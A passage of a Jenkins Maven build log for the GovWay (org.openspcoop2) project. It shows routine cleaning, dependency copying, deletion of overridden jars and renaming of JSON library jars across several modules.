/var/lib/jenkins/workspace/GovWay/lib/jaxb (includes = [*.jar], excludes = []) 18:07:51 [INFO] 18:07:51 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jaxb --- 18:07:51 [INFO] 18:07:51 [INFO] ---------------< org.openspcoop2:org.openspcoop2.jetty >---------------- 18:07:51 [INFO] Building dependencies.jetty 1.0 [15/67] 18:07:51 [INFO] from mvn/dependencies/jetty/pom.xml 18:07:51 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:51 [INFO] 18:07:51 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jetty --- 18:07:51 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jetty (includes = [*.jar], excludes = []) 18:07:51 [INFO] 18:07:51 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jetty --- 18:07:51 [INFO] 18:07:51 [INFO] ----------------< org.openspcoop2:org.openspcoop2.jmx >----------------- 18:07:51 [INFO] Building dependencies.jmx 1.0 [16/67] 18:07:51 [INFO] from mvn/dependencies/jmx/pom.xml 18:07:51 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:51 [INFO] 18:07:51 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jmx --- 18:07:51 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jmx (includes = [*.jar], excludes = []) 18:07:51 [INFO] 18:07:51 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jmx --- 18:07:51 [INFO] 18:07:51 [INFO] ----------------< org.openspcoop2:org.openspcoop2.json >---------------- 18:07:51 [INFO] Building dependencies.json 1.0 [17/67] 18:07:51 [INFO] from mvn/dependencies/json/pom.xml 18:07:51 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:51 [INFO] 18:07:51 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.json --- 18:07:51 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/json (includes = [*.jar], excludes = []) 18:07:51 [INFO] 18:07:51 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.json --- 18:07:51 [INFO] 18:07:51 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.json --- 18:07:51 [INFO] Executing tasks 18:07:51 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/json/json-path-2.9.0.jar 18:07:51 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-validator-2.2.14.jar 18:07:51 [INFO] Executed tasks 18:07:51 [INFO] 18:07:51 [INFO] --- copy-rename:1.0:rename (rename-file-networknt) @ org.openspcoop2.json --- 18:07:51 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-validator-1.5.7.jar to /var/lib/jenkins/workspace/GovWay/lib/json/networknt_json-schema-validator-1.5.7.jar 18:07:51 [INFO] 18:07:51 [INFO] --- copy-rename:1.0:rename (rename-file-github-validator) @ org.openspcoop2.json --- 18:07:51 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-validator-2.2.14-gov4j-1.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_json-schema-validator-2.2.14-gov4j-1.jar 18:07:51 [INFO] 18:07:51 [INFO] --- copy-rename:1.0:rename (rename-file-github-core) @ org.openspcoop2.json --- 18:07:51 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/json-schema-core-1.2.14.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_json-schema-core-1.2.14.jar 18:07:51 [INFO] 18:07:51 [INFO] --- copy-rename:1.0:rename (rename-file-github-jackson) @ org.openspcoop2.json --- 18:07:51 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/jackson-coreutils-2.0.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_jackson-coreutils-2.0.jar 18:07:51 [INFO] 18:07:51 [INFO] --- copy-rename:1.0:rename (rename-file-github-jackson-equivalence) @ org.openspcoop2.json --- 18:07:51 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/jackson-coreutils-equivalence-1.0.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_jackson-coreutils-equivalence-1.0.jar 18:07:51 [INFO] 18:07:51 [INFO] --- copy-rename:1.0:rename (rename-file-github-uri-template) @ org.openspcoop2.json --- 18:07:51 [INFO] Renamed /var/lib/jenkins/workspace/GovWay/lib/json/uri-template-0.10.jar to /var/lib/jenkins/workspace/GovWay/lib/json/github_uri-template-0.10.jar 18:07:51 [INFO] 18:07:51 [INFO] ----------------< org.openspcoop2:org.openspcoop2.log >----------------- 18:07:51 [INFO] Building dependencies.log 1.0 [18/67] 18:07:51 [INFO] from mvn/dependencies/log/pom.xml 18:07:51 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:51 [INFO] 18:07:51 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.log --- 18:07:51 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/log (includes = [*.jar], excludes = []) 18:07:51 [INFO] 18:07:51 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.log --- 18:07:51 [INFO] 18:07:51 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.log --- 18:07:51 [INFO] Executing tasks 18:07:51 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/log/slf4j-api-2.0.17.jar 18:07:51 [INFO] Executed tasks 18:07:51 [INFO]